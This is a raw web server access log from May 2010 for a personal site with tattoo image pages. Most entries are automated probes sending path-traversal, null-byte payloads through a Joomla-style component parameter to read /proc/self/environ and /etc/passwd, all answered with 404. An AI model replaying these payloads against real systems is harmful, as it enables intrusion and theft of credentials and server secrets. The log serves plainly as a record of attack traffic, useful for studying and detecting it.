72.5.54.51 - - [22/May/2010:23:02:27 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:03:54 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:03:54 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [22/May/2010:23:04:00 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.5.54.51 - - [22/May/2010:23:05:04 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:05:04 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [22/May/2010:23:05:04 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
65.55.51.112 - - [22/May/2010:23:07:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [22/May/2010:23:08:09 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.195.204.106 - - [22/May/2010:23:08:15 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
217.195.204.106 - - [22/May/2010:23:08:15 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:09:42 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.98.216.61 - - [22/May/2010:23:10:01 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:10:01 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
216.246.28.113 - - [22/May/2010:23:10:14 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:10:14 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.98.216.61 - - [22/May/2010:23:10:44 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:10:44 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.238.172.21 - - [22/May/2010:23:11:42 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.238.172.21 - - [22/May/2010:23:11:43 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
87.238.172.21 - - [22/May/2010:23:11:43 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.250.255.243 - - [22/May/2010:23:11:50 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.12.168 - - [22/May/2010:23:12:53 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 200 577895 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
216.246.28.113 - - [22/May/2010:23:13:17 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:13:17 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:13:17 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:17:24 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:17:24 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.246.28.113 - - [22/May/2010:23:17:24 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.204.179 - - [22/May/2010:23:18:33 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.93 - - [22/May/2010:23:18:33 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.195.204.106 - - [22/May/2010:23:19:31 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
217.195.204.106 - - [22/May/2010:23:19:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
217.195.204.106 - - [22/May/2010:23:19:32 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.46.13.131 - - [22/May/2010:23:20:03 -0500] "GET /logs/access_log.1157673600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.236.37.218 - - [22/May/2010:23:20:57 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:20:57 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
99.198.118.114 - - [22/May/2010:23:21:25 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
173.236.37.218 - - [22/May/2010:23:21:25 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
99.198.118.114 - - [22/May/2010:23:21:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:21:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:21:56 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:21:58 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:21:58 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
97.74.75.246 - - [22/May/2010:23:22:11 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:22:26 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:22:26 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.250.255.243 - - [22/May/2010:23:23:31 -0500] "GET /logs/access_log.1229040000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [22/May/2010:23:23:38 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:40 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:42 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:43 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:44 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:45 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:46 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:47 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:49 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:50 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:52 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:52 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:53 -0500] "GET //index.php?option=com_hsconfig&controller=../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:54 -0500] "GET //index.php?option=com_hsconfig&controller=../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:55 -0500] "GET //index.php?option=com_hsconfig&controller=../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:56 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:58 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:23:59 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:00 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:01 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:02 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:03 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:04 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.98.216.61 - - [22/May/2010:23:24:05 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
173.236.37.218 - - [22/May/2010:23:25:14 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:25:14 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:25:14 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:25:15 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:25:15 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.37.218 - - [22/May/2010:23:25:15 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
99.198.118.114 - - [22/May/2010:23:25:28 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:25:28 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:25:28 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:25:43 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:25:43 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:25:43 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:25:53 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:25:53 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.198.118.114 - - [22/May/2010:23:25:53 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
97.74.75.246 - - [22/May/2010:23:26:12 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:26:12 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:26:12 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.59.218 - - [22/May/2010:23:27:55 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:27:55 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.59.218 - - [22/May/2010:23:27:55 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
118.93.174.129 - - [22/May/2010:23:28:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.nz/url?sa=t&source=web&ct=res&cd=13&ved=0CEkQFjAM&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+tattoo&ei=Z634S4y2GIbBcZLHiOcL&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:34 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:41 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:43 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:28:48 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
97.74.75.246 - - [22/May/2010:23:28:51 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:28:51 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
97.74.75.246 - - [22/May/2010:23:28:51 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:08 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:16 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
118.93.174.129 - - [22/May/2010:23:29:34 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
